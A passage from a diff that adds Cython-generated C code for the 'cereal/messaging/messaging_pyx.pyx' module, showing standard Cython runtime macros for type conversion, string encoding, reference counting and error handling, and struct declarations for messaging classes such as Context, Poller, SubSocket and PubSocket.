(type)PY_SSIZE_T_MIN ||\ + v == (type)PY_SSIZE_T_MIN))) ||\ + (sizeof(type) == sizeof(Py_ssize_t) &&\ + (is_signed || likely(v < (type)PY_SSIZE_T_MAX ||\ + v == (type)PY_SSIZE_T_MAX))) ) +static CYTHON_INLINE int __Pyx_is_valid_index(Py_ssize_t i, Py_ssize_t limit) { + return (size_t) i < (size_t) limit; +} +#if defined (__cplusplus) && __cplusplus >= 201103L + #include + #define __Pyx_sst_abs(value) std::abs(value) +#elif SIZEOF_INT >= SIZEOF_SIZE_T + #define __Pyx_sst_abs(value) abs(value) +#elif SIZEOF_LONG >= SIZEOF_SIZE_T + #define __Pyx_sst_abs(value) labs(value) +#elif defined (_MSC_VER) + #define __Pyx_sst_abs(value) ((Py_ssize_t)_abs64(value)) +#elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L + #define __Pyx_sst_abs(value) llabs(value) +#elif defined (__GNUC__) + #define __Pyx_sst_abs(value) __builtin_llabs(value) +#else + #define __Pyx_sst_abs(value) ((value<0) ? -value : value) +#endif +static CYTHON_INLINE const char* __Pyx_PyObject_AsString(PyObject*); +static CYTHON_INLINE const char* __Pyx_PyObject_AsStringAndSize(PyObject*, Py_ssize_t* length); +#define __Pyx_PyByteArray_FromString(s) PyByteArray_FromStringAndSize((const char*)s, strlen((const char*)s)) +#define __Pyx_PyByteArray_FromStringAndSize(s, l) PyByteArray_FromStringAndSize((const char*)s, l) +#define __Pyx_PyBytes_FromString PyBytes_FromString +#define __Pyx_PyBytes_FromStringAndSize PyBytes_FromStringAndSize +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_FromString(const char*); +#if PY_MAJOR_VERSION < 3 + #define __Pyx_PyStr_FromString __Pyx_PyBytes_FromString + #define __Pyx_PyStr_FromStringAndSize __Pyx_PyBytes_FromStringAndSize +#else + #define __Pyx_PyStr_FromString __Pyx_PyUnicode_FromString + #define __Pyx_PyStr_FromStringAndSize __Pyx_PyUnicode_FromStringAndSize +#endif +#define __Pyx_PyBytes_AsWritableString(s) ((char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsWritableSString(s) ((signed char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsWritableUString(s) ((unsigned char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsString(s) ((const char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsSString(s) ((const signed char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsUString(s) ((const unsigned char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyObject_AsWritableString(s) ((char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsWritableSString(s) ((signed char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsWritableUString(s) ((unsigned char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsSString(s) ((const signed char*) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsUString(s) ((const unsigned char*) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_FromCString(s) __Pyx_PyObject_FromString((const char*)s) +#define __Pyx_PyBytes_FromCString(s) __Pyx_PyBytes_FromString((const char*)s) +#define __Pyx_PyByteArray_FromCString(s) __Pyx_PyByteArray_FromString((const char*)s) +#define __Pyx_PyStr_FromCString(s) __Pyx_PyStr_FromString((const char*)s) +#define __Pyx_PyUnicode_FromCString(s) __Pyx_PyUnicode_FromString((const char*)s) +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_INLINE size_t __Pyx_Py_UNICODE_strlen(const wchar_t *u) +{ + const wchar_t *u_end = u; + while (*u_end++) ; + return (size_t)(u_end - u - 1); +} +#else +static CYTHON_INLINE size_t __Pyx_Py_UNICODE_strlen(const Py_UNICODE *u) +{ + const Py_UNICODE *u_end = u; + while (*u_end++) ; + return (size_t)(u_end - u - 1); +} +#endif +#define __Pyx_PyUnicode_FromOrdinal(o) PyUnicode_FromOrdinal((int)o) +#define __Pyx_PyUnicode_FromUnicode(u) PyUnicode_FromUnicode(u, __Pyx_Py_UNICODE_strlen(u)) +#define __Pyx_PyUnicode_FromUnicodeAndLength PyUnicode_FromUnicode +#define __Pyx_PyUnicode_AsUnicode PyUnicode_AsUnicode +#define __Pyx_NewRef(obj) (Py_INCREF(obj), obj) +#define __Pyx_Owned_Py_None(b) __Pyx_NewRef(Py_None) +static CYTHON_INLINE PyObject * __Pyx_PyBool_FromLong(long b); +static CYTHON_INLINE int __Pyx_PyObject_IsTrue(PyObject*); +static CYTHON_INLINE int __Pyx_PyObject_IsTrueAndDecref(PyObject*); +static CYTHON_INLINE PyObject* __Pyx_PyNumber_IntOrLong(PyObject* x); +#define __Pyx_PySequence_Tuple(obj)\ + (likely(PyTuple_CheckExact(obj)) ? __Pyx_NewRef(obj) : PySequence_Tuple(obj)) +static CYTHON_INLINE Py_ssize_t __Pyx_PyIndex_AsSsize_t(PyObject*); +static CYTHON_INLINE PyObject * __Pyx_PyInt_FromSize_t(size_t); +static CYTHON_INLINE Py_hash_t __Pyx_PyIndex_AsHash_t(PyObject*); +#if CYTHON_ASSUME_SAFE_MACROS +#define __pyx_PyFloat_AsDouble(x) (PyFloat_CheckExact(x) ? PyFloat_AS_DOUBLE(x) : PyFloat_AsDouble(x)) +#else +#define __pyx_PyFloat_AsDouble(x) PyFloat_AsDouble(x) +#endif +#define __pyx_PyFloat_AsFloat(x) ((float) __pyx_PyFloat_AsDouble(x)) +#if PY_MAJOR_VERSION >= 3 +#define __Pyx_PyNumber_Int(x) (PyLong_CheckExact(x) ? __Pyx_NewRef(x) : PyNumber_Long(x)) +#else +#define __Pyx_PyNumber_Int(x) (PyInt_CheckExact(x) ? __Pyx_NewRef(x) : PyNumber_Int(x)) +#endif +#if CYTHON_USE_PYLONG_INTERNALS + #if PY_VERSION_HEX >= 0x030C00A7 + #ifndef _PyLong_SIGN_MASK + #define _PyLong_SIGN_MASK 3 + #endif + #ifndef _PyLong_NON_SIZE_BITS + #define _PyLong_NON_SIZE_BITS 3 + #endif + #define __Pyx_PyLong_Sign(x) (((PyLongObject*)x)->long_value.lv_tag & _PyLong_SIGN_MASK) + #define __Pyx_PyLong_IsNeg(x) ((__Pyx_PyLong_Sign(x) & 2) != 0) + #define __Pyx_PyLong_IsNonNeg(x) (!__Pyx_PyLong_IsNeg(x)) + #define __Pyx_PyLong_IsZero(x) (__Pyx_PyLong_Sign(x) & 1) + #define __Pyx_PyLong_IsPos(x) (__Pyx_PyLong_Sign(x) == 0) + #define __Pyx_PyLong_CompactValueUnsigned(x) (__Pyx_PyLong_Digits(x)[0]) + #define __Pyx_PyLong_DigitCount(x) ((Py_ssize_t) (((PyLongObject*)x)->long_value.lv_tag >> _PyLong_NON_SIZE_BITS)) + #define __Pyx_PyLong_SignedDigitCount(x)\ + ((1 - (Py_ssize_t) __Pyx_PyLong_Sign(x)) * __Pyx_PyLong_DigitCount(x)) + #if defined(PyUnstable_Long_IsCompact) && defined(PyUnstable_Long_CompactValue) + #define __Pyx_PyLong_IsCompact(x) PyUnstable_Long_IsCompact((PyLongObject*) x) + #define __Pyx_PyLong_CompactValue(x) PyUnstable_Long_CompactValue((PyLongObject*) x) + #else + #define __Pyx_PyLong_IsCompact(x) (((PyLongObject*)x)->long_value.lv_tag < (2 << _PyLong_NON_SIZE_BITS)) + #define __Pyx_PyLong_CompactValue(x) ((1 - (Py_ssize_t) __Pyx_PyLong_Sign(x)) * (Py_ssize_t) __Pyx_PyLong_Digits(x)[0]) + #endif + typedef Py_ssize_t __Pyx_compact_pylong; + typedef size_t __Pyx_compact_upylong; + #else // Py < 3.12 + #define __Pyx_PyLong_IsNeg(x) (Py_SIZE(x) < 0) + #define __Pyx_PyLong_IsNonNeg(x) (Py_SIZE(x) >= 0) + #define __Pyx_PyLong_IsZero(x) (Py_SIZE(x) == 0) + #define __Pyx_PyLong_IsPos(x) (Py_SIZE(x) > 0) + #define __Pyx_PyLong_CompactValueUnsigned(x) ((Py_SIZE(x) == 0) ? 0 : __Pyx_PyLong_Digits(x)[0]) + #define __Pyx_PyLong_DigitCount(x) __Pyx_sst_abs(Py_SIZE(x)) + #define __Pyx_PyLong_SignedDigitCount(x) Py_SIZE(x) + #define __Pyx_PyLong_IsCompact(x) (Py_SIZE(x) == 0 || Py_SIZE(x) == 1 || Py_SIZE(x) == -1) + #define __Pyx_PyLong_CompactValue(x)\ + ((Py_SIZE(x) == 0) ? (sdigit) 0 : ((Py_SIZE(x) < 0) ? -(sdigit)__Pyx_PyLong_Digits(x)[0] : (sdigit)__Pyx_PyLong_Digits(x)[0])) + typedef sdigit __Pyx_compact_pylong; + typedef digit __Pyx_compact_upylong; + #endif + #if PY_VERSION_HEX >= 0x030C00A5 + #define __Pyx_PyLong_Digits(x) (((PyLongObject*)x)->long_value.ob_digit) + #else + #define __Pyx_PyLong_Digits(x) (((PyLongObject*)x)->ob_digit) + #endif +#endif +#if PY_MAJOR_VERSION < 3 && __PYX_DEFAULT_STRING_ENCODING_IS_ASCII +static int __Pyx_sys_getdefaultencoding_not_ascii; +static int __Pyx_init_sys_getdefaultencoding_params(void) { + PyObject* sys; + PyObject* default_encoding = NULL; + PyObject* ascii_chars_u = NULL; + PyObject* ascii_chars_b = NULL; + const char* default_encoding_c; + sys = PyImport_ImportModule("sys"); + if (!sys) goto bad; + default_encoding = PyObject_CallMethod(sys, (char*) "getdefaultencoding", NULL); + Py_DECREF(sys); + if (!default_encoding) goto bad; + default_encoding_c = PyBytes_AsString(default_encoding); + if (!default_encoding_c) goto bad; + if (strcmp(default_encoding_c, "ascii") == 0) { + __Pyx_sys_getdefaultencoding_not_ascii = 0; + } else { + char ascii_chars[128]; + int c; + for (c = 0; c < 128; c++) { + ascii_chars[c] = (char) c; + } + __Pyx_sys_getdefaultencoding_not_ascii = 1; + ascii_chars_u = PyUnicode_DecodeASCII(ascii_chars, 128, NULL); + if (!ascii_chars_u) goto bad; + ascii_chars_b = PyUnicode_AsEncodedString(ascii_chars_u, default_encoding_c, NULL); + if (!ascii_chars_b || !PyBytes_Check(ascii_chars_b) || memcmp(ascii_chars, PyBytes_AS_STRING(ascii_chars_b), 128) != 0) { + PyErr_Format( + PyExc_ValueError, + "This module compiled with c_string_encoding=ascii, but default encoding '%.200s' is not a superset of ascii.", + default_encoding_c); + goto bad; + } + Py_DECREF(ascii_chars_u); + Py_DECREF(ascii_chars_b); + } + Py_DECREF(default_encoding); + return 0; +bad: + Py_XDECREF(default_encoding); + Py_XDECREF(ascii_chars_u); + Py_XDECREF(ascii_chars_b); + return -1; +} +#endif +#if __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT && PY_MAJOR_VERSION >= 3 +#define __Pyx_PyUnicode_FromStringAndSize(c_str, size) PyUnicode_DecodeUTF8(c_str, size, NULL) +#else +#define __Pyx_PyUnicode_FromStringAndSize(c_str, size) PyUnicode_Decode(c_str, size, __PYX_DEFAULT_STRING_ENCODING, NULL) +#if __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT +static char* __PYX_DEFAULT_STRING_ENCODING; +static int __Pyx_init_sys_getdefaultencoding_params(void) { + PyObject* sys; + PyObject* default_encoding = NULL; + char* default_encoding_c; + sys = PyImport_ImportModule("sys"); + if (!sys) goto bad; + default_encoding = PyObject_CallMethod(sys, (char*) (const char*) "getdefaultencoding", NULL); + Py_DECREF(sys); + if (!default_encoding) goto bad; + default_encoding_c = PyBytes_AsString(default_encoding); + if (!default_encoding_c) goto bad; + __PYX_DEFAULT_STRING_ENCODING = (char*) malloc(strlen(default_encoding_c) + 1); + if (!__PYX_DEFAULT_STRING_ENCODING) goto bad; + strcpy(__PYX_DEFAULT_STRING_ENCODING, default_encoding_c); + Py_DECREF(default_encoding); + return 0; +bad: + Py_XDECREF(default_encoding); + return -1; +} +#endif +#endif + + +/* Test for GCC > 2.95 */ +#if defined(__GNUC__) && (__GNUC__ > 2 || (__GNUC__ == 2 && (__GNUC_MINOR__ > 95))) + #define likely(x) __builtin_expect(!!(x), 1) + #define unlikely(x) __builtin_expect(!!(x), 0) +#else /* !__GNUC__ or GCC < 2.95 */ + #define likely(x) (x) + #define unlikely(x) (x) +#endif /* __GNUC__ */ +static CYTHON_INLINE void __Pyx_pretend_to_initialize(void* ptr) { (void)ptr; } + +#if !CYTHON_USE_MODULE_STATE +static PyObject *__pyx_m = NULL; +#endif +static int __pyx_lineno; +static int __pyx_clineno = 0; +static const char * __pyx_cfilenm = __FILE__; +static const char *__pyx_filename; + +/* #### Code section: filename_table ### */ + +static const char *__pyx_f[] = { + "cereal/messaging/messaging_pyx.pyx", + "", +}; +/* #### Code section: utility_code_proto_before_types ### */ +/* NoFastGil.proto */ +#define __Pyx_PyGILState_Ensure PyGILState_Ensure +#define __Pyx_PyGILState_Release PyGILState_Release +#define __Pyx_FastGIL_Remember() +#define __Pyx_FastGIL_Forget() +#define __Pyx_FastGilFuncInit() + +/* ForceInitThreads.proto */ +#ifndef __PYX_FORCE_INIT_THREADS + #define __PYX_FORCE_INIT_THREADS 0 +#endif + +/* #### Code section: numeric_typedefs ### */ +/* #### Code section: complex_type_declarations ### */ +/* #### Code section: type_declarations ### */ + +/*--- Type declarations ---*/ +struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event; +struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SocketEventHandle; +struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Context; +struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller; +struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket; +struct __pyx_obj_6cereal_9messaging_13messaging_pyx_PubSocket; + +/* "cereal/messaging/messaging_pyx.pyx":55 + * + * + * cdef class Event: # <<<<<<<<<<<<<< + * cdef cppEvent event; + * + */ +struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event { + PyObject_HEAD + struct __pyx_vtabstruct_6cereal_9messaging_13messaging_pyx_Event *__pyx_vtab; + Event event; +}; + + +/* "cereal/messaging/messaging_pyx.pyx":85 + * + * + * cdef class SocketEventHandle: # <<<<<<<<<<<<<< + * cdef cppSocketEventHandle * handle; + * + */ +struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SocketEventHandle { + PyObject_HEAD + SocketEventHandle *handle; +}; + + +/* "cereal/messaging/messaging_pyx.pyx":117 + * + * + * cdef class Context: # <<<<<<<<<<<<<< + * cdef cppContext * context + * + */ +struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Context { + PyObject_HEAD + Context *context; +}; + + +/* "cereal/messaging/messaging_pyx.pyx":134 + * + * + * cdef class Poller: # <<<<<<<<<<<<<< + * cdef cppPoller * poller + * cdef list sub_sockets + */ +struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller { + PyObject_HEAD + Poller *poller; + PyObject *sub_sockets; +}; + + +/* "cereal/messaging/messaging_pyx.pyx":164 + * + * + * cdef class SubSocket: # <<<<<<<<<<<<<< + * cdef cppSubSocket * socket + * cdef bool is_owner + */ +struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket { + PyObject_HEAD + struct __pyx_vtabstruct_6cereal_9messaging_13messaging_pyx_SubSocket *__pyx_vtab; + SubSocket *socket; + bool is_owner; +}; + + +/* "cereal/messaging/messaging_pyx.pyx":216 + * + * + * cdef class PubSocket: # <<<<<<<<<<<<<< + * cdef cppPubSocket * socket + * + */ +struct __pyx_obj_6cereal_9messaging_13messaging_pyx_PubSocket { + PyObject_HEAD + PubSocket *socket; +}; + + + +/* "cereal/messaging/messaging_pyx.pyx":55 + * + * + * cdef class Event: # <<<<<<<<<<<<<< + * cdef cppEvent event; + * + */ + +struct __pyx_vtabstruct_6cereal_9messaging_13messaging_pyx_Event { + PyObject *(*setEvent)(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *, Event); +}; +static struct __pyx_vtabstruct_6cereal_9messaging_13messaging_pyx_Event *__pyx_vtabptr_6cereal_9messaging_13messaging_pyx_Event; + + +/* "cereal/messaging/messaging_pyx.pyx":164 + * + * + * cdef class SubSocket: # <<<<<<<<<<<<<< + * cdef cppSubSocket * socket + * cdef bool is_owner + */ + +struct __pyx_vtabstruct_6cereal_9messaging_13messaging_pyx_SubSocket { + PyObject *(*setPtr)(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *, SubSocket *); +}; +static struct __pyx_vtabstruct_6cereal_9messaging_13messaging_pyx_SubSocket *__pyx_vtabptr_6cereal_9messaging_13messaging_pyx_SubSocket; +/* #### Code section: utility_code_proto ### */ + +/* --- Runtime support code (head) --- */ +/* Refnanny.proto */ +#ifndef CYTHON_REFNANNY + #define CYTHON_REFNANNY 0 +#endif +#if CYTHON_REFNANNY + typedef struct { + void (*INCREF)(void*, PyObject*, Py_ssize_t); + void (*DECREF)(void*, PyObject*, Py_ssize_t); + void (*GOTREF)(void*, PyObject*, Py_ssize_t); + void (*GIVEREF)(void*, PyObject*, Py_ssize_t); + void* (*SetupContext)(const char*, Py_ssize_t, const char*); + void (*FinishContext)(void**); + } __Pyx_RefNannyAPIStruct; + static __Pyx_RefNannyAPIStruct *__Pyx_RefNanny = NULL; + static __Pyx_RefNannyAPIStruct *__Pyx_RefNannyImportAPI(const char *modname); + #define __Pyx_RefNannyDeclarations void *__pyx_refnanny = NULL; +#ifdef WITH_THREAD + #define __Pyx_RefNannySetupContext(name, acquire_gil)\ + if (acquire_gil) {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__));\ + PyGILState_Release(__pyx_gilstate_save);\ + } else {\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__));\ + } + #define __Pyx_RefNannyFinishContextNogil() {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __Pyx_RefNannyFinishContext();\ + PyGILState_Release(__pyx_gilstate_save);\ + } +#else + #define __Pyx_RefNannySetupContext(name, acquire_gil)\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__)) + #define __Pyx_RefNannyFinishContextNogil() __Pyx_RefNannyFinishContext() +#endif + #define __Pyx_RefNannyFinishContextNogil() {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __Pyx_RefNannyFinishContext();\ + PyGILState_Release(__pyx_gilstate_save);\ + } + #define __Pyx_RefNannyFinishContext()\ + __Pyx_RefNanny->FinishContext(&__pyx_refnanny) + #define __Pyx_INCREF(r) __Pyx_RefNanny->INCREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_DECREF(r) __Pyx_RefNanny->DECREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_GOTREF(r) __Pyx_RefNanny->GOTREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_GIVEREF(r) __Pyx_RefNanny->GIVEREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_XINCREF(r) do { if((r) == NULL); else {__Pyx_INCREF(r); }} while(0) + #define __Pyx_XDECREF(r) do { if((r) == NULL); else {__Pyx_DECREF(r); }} while(0) + #define __Pyx_XGOTREF(r) do { if((r) == NULL); else {__Pyx_GOTREF(r); }} while(0) + #define __Pyx_XGIVEREF(r) do { if((r) == NULL); else {__Pyx_GIVEREF(r);}} while(0) +#else + #define __Pyx_RefNannyDeclarations + #define __Pyx_RefNannySetupContext(name, acquire_gil) + #define __Pyx_RefNannyFinishContextNogil() + #define __Pyx_RefNannyFinishContext() + #define __Pyx_INCREF(r) Py_INCREF(r) + #define __Pyx_DECREF(r) Py_DECREF(r) + #define __Pyx_GOTREF(r) + #define __Pyx_GIVEREF(r) + #define __Pyx_XINCREF(r) Py_XINCREF(r) + #define __Pyx_XDECREF(r) Py_XDECREF(r) + #define __Pyx_XGOTREF(r) + #define __Pyx_XGIVEREF(r) +#endif +#define __Pyx_Py_XDECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; Py_XDECREF(tmp);\ + } while (0) +#define __Pyx_XDECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; __Pyx_XDECREF(tmp);\ + } while (0) +#define __Pyx_DECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; __Pyx_DECREF(tmp);\ + } while (0) +#define __Pyx_CLEAR(r) do { PyObject* tmp = ((PyObject*)(r)); r = NULL; __Pyx_DECREF(tmp);} while(0) +#define __Pyx_XCLEAR(r) do { if((r) != NULL) {PyObject* tmp = ((PyObject*)(r)); r = NULL; __Pyx_DECREF(tmp);}} while(0) + +/* PyErrExceptionMatches.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyErr_ExceptionMatches(err) __Pyx_PyErr_ExceptionMatchesInState(__pyx_tstate, err) +static CYTHON_INLINE int __Pyx_PyErr_ExceptionMatchesInState(PyThreadState* tstate, PyObject* err); +#else +#define __Pyx_PyErr_ExceptionMatches(err) PyErr_ExceptionMatches(err) +#endif + +/* PyThreadStateGet.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyThreadState_declare PyThreadState *__pyx_tstate; +#define __Pyx_PyThreadState_assign __pyx_tstate = __Pyx_PyThreadState_Current; +#if PY_VERSION_HEX >= 0x030C00A6 +#define __Pyx_PyErr_Occurred() (__pyx_tstate->current_exception != NULL) +#define __Pyx_PyErr_CurrentExceptionType() (__pyx_tstate->current_exception ? (PyObject*) Py_TYPE(__pyx_tstate->current_exception) : (PyObject*) NULL) +#else +#define __Pyx_PyErr_Occurred() (__pyx_tstate->curexc_type != NULL) +#define __Pyx_PyErr_CurrentExceptionType() (__pyx_tstate->curexc_type) +#endif +#else +#define __Pyx_PyThreadState_declare +#define __Pyx_PyThreadState_assign +#define __Pyx_PyErr_Occurred() (PyErr_Occurred() != NULL) +#define __Pyx_PyErr_CurrentExceptionType() PyErr_Occurred() +#endif + +/* PyErrFetchRestore.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyErr_Clear() __Pyx_ErrRestore(NULL, NULL, NULL) +#define __Pyx_ErrRestoreWithState(type, value, tb) __Pyx_ErrRestoreInState(PyThreadState_GET(), type, value, tb) +#define __Pyx_ErrFetchWithState(type, value, tb) __Pyx_ErrFetchInState(PyThreadState_GET(), type, value, tb) +#define __Pyx_ErrRestore(type, value, tb) __Pyx_ErrRestoreInState(__pyx_tstate, type, value, tb) +#define __Pyx_ErrFetch(type, value, tb) __Pyx_ErrFetchInState(__pyx_tstate, type, value, tb) +static CYTHON_INLINE void __Pyx_ErrRestoreInState(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb); +static CYTHON_INLINE void __Pyx_ErrFetchInState(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A6 +#define __Pyx_PyErr_SetNone(exc) (Py_INCREF(exc), __Pyx_ErrRestore((exc), NULL, NULL)) +#else +#define __Pyx_PyErr_SetNone(exc) PyErr_SetNone(exc) +#endif +#else +#define __Pyx_PyErr_Clear() PyErr_Clear() +#define __Pyx_PyErr_SetNone(exc) PyErr_SetNone(exc) +#define __Pyx_ErrRestoreWithState(type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetchWithState(type, value, tb) PyErr_Fetch(type, value, tb) +#define __Pyx_ErrRestoreInState(tstate, type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetchInState(tstate, type, value, tb) PyErr_Fetch(type, value, tb) +#define __Pyx_ErrRestore(type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetch(type, value, tb) PyErr_Fetch(type, value, tb) +#endif + +/* PyObjectGetAttrStr.proto */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStr(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GetAttrStr(o,n) PyObject_GetAttr(o,n) +#endif + +/* PyObjectGetAttrStrNoError.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStrNoError(PyObject* obj, PyObject* attr_name); + +/* GetBuiltinName.proto */ +static PyObject *__Pyx_GetBuiltinName(PyObject *name); + +/* TupleAndListFromArray.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyList_FromArray(PyObject *const *src, Py_ssize_t n); +static CYTHON_INLINE PyObject* __Pyx_PyTuple_FromArray(PyObject *const *src, Py_ssize_t n); +#endif + +/* IncludeStringH.proto */ +#include + +/* BytesEquals.proto */ +static CYTHON_INLINE int __Pyx_PyBytes_Equals(PyObject* s1, PyObject* s2, int equals); + +/* UnicodeEquals.proto */ +static CYTHON_INLINE int __Pyx_PyUnicode_Equals(PyObject* s1, PyObject* s2, int equals); + +/* fastcall.proto */ +#define __Pyx_Arg_VARARGS(args, i) PyTuple_GET_ITEM(args, i) +#define __Pyx_NumKwargs_VARARGS(kwds) PyDict_Size(kwds) +#define __Pyx_KwValues_VARARGS(args, nargs) NULL +#define __Pyx_GetKwValue_VARARGS(kw, kwvalues, s) __Pyx_PyDict_GetItemStrWithError(kw, s) +#define __Pyx_KwargsAsDict_VARARGS(kw, kwvalues) PyDict_Copy(kw) +#if CYTHON_METH_FASTCALL + #define __Pyx_Arg_FASTCALL(args, i) args[i] + #define __Pyx_NumKwargs_FASTCALL(kwds) PyTuple_GET_SIZE(kwds) + #define __Pyx_KwValues_FASTCALL(args, nargs) ((args) + (nargs)) + static CYTHON_INLINE PyObject * __Pyx_GetKwValue_FASTCALL(PyObject *kwnames, PyObject *const *kwvalues, PyObject *s); + #define __Pyx_KwargsAsDict_FASTCALL(kw, kwvalues) _PyStack_AsDict(kwvalues, kw) +#else + #define __Pyx_Arg_FASTCALL __Pyx_Arg_VARARGS + #define __Pyx_NumKwargs_FASTCALL __Pyx_NumKwargs_VARARGS + #define __Pyx_KwValues_FASTCALL __Pyx_KwValues_VARARGS + #define __Pyx_GetKwValue_FASTCALL __Pyx_GetKwValue_VARARGS + #define __Pyx_KwargsAsDict_FASTCALL __Pyx_KwargsAsDict_VARARGS +#endif +#if CYTHON_COMPILING_IN_CPYTHON +#define __Pyx_ArgsSlice_VARARGS(args, start, stop) __Pyx_PyTuple_FromArray(&__Pyx_Arg_VARARGS(args, start), stop - start) +#define __Pyx_ArgsSlice_FASTCALL(args, start, stop) __Pyx_PyTuple_FromArray(&__Pyx_Arg_FASTCALL(args, start), stop - start) +#else +#define __Pyx_ArgsSlice_VARARGS(args, start, stop) PyTuple_GetSlice(args, start, stop) +#define __Pyx_ArgsSlice_FASTCALL(args, start, stop) PyTuple_GetSlice(args, start, stop) +#endif + +/* RaiseDoubleKeywords.proto */ +static void __Pyx_RaiseDoubleKeywordsError(const char* func_name, PyObject* kw_name); + +/* ParseKeywords.proto */ +static int __Pyx_ParseOptionalKeywords(PyObject *kwds, PyObject *const *kwvalues, + PyObject **argnames[], + PyObject *kwds2, PyObject *values[], Py_ssize_t num_pos_args, + const char* function_name); + +/* RaiseArgTupleInvalid.proto */ +static void __Pyx_RaiseArgtupleInvalid(const char* func_name, int exact, + Py_ssize_t num_min, Py_ssize_t num_max, Py_ssize_t num_found); + +/* PyFunctionFastCall.proto */ +#if CYTHON_FAST_PYCALL +#if !CYTHON_VECTORCALL +#define __Pyx_PyFunction_FastCall(func, args, nargs)\ + __Pyx_PyFunction_FastCallDict((func), (args), (nargs), NULL) +static PyObject *__Pyx_PyFunction_FastCallDict(PyObject *func, PyObject **args, Py_ssize_t nargs, PyObject *kwargs); +#endif +#define __Pyx_BUILD_ASSERT_EXPR(cond)\ + (sizeof(char [1 - 2*!(cond)]) - 1) +#ifndef Py_MEMBER_SIZE +#define Py_MEMBER_SIZE(type, member) sizeof(((type *)0)->member) +#endif +#if !CYTHON_VECTORCALL +#if PY_VERSION_HEX >= 0x03080000 + #include "frameobject.h" +#if PY_VERSION_HEX >= 0x030b00a6 + #ifndef Py_BUILD_CORE + #define Py_BUILD_CORE 1 + #endif + #include "internal/pycore_frame.h" +#endif + #define __Pxy_PyFrame_Initialize_Offsets() + #define __Pyx_PyFrame_GetLocalsplus(frame) ((frame)->f_localsplus) +#else + static size_t __pyx_pyframe_localsplus_offset = 0; + #include "frameobject.h" + #define __Pxy_PyFrame_Initialize_Offsets()\ + ((void)__Pyx_BUILD_ASSERT_EXPR(sizeof(PyFrameObject) == offsetof(PyFrameObject, f_localsplus) + Py_MEMBER_SIZE(PyFrameObject, f_localsplus)),\ + (void)(__pyx_pyframe_localsplus_offset = ((size_t)PyFrame_Type.tp_basicsize) - Py_MEMBER_SIZE(PyFrameObject, f_localsplus))) + #define __Pyx_PyFrame_GetLocalsplus(frame)\ + (assert(__pyx_pyframe_localsplus_offset), (PyObject **)(((char *)(frame)) + __pyx_pyframe_localsplus_offset)) +#endif +#endif +#endif + +/* PyObjectCall.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_Call(PyObject *func, PyObject *arg, PyObject *kw); +#else +#define __Pyx_PyObject_Call(func, arg, kw) PyObject_Call(func, arg, kw) +#endif + +/* PyObjectCallMethO.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallMethO(PyObject *func, PyObject *arg); +#endif + +/* PyObjectFastCall.proto */ +#define __Pyx_PyObject_FastCall(func, args, nargs) __Pyx_PyObject_FastCallDict(func, args, 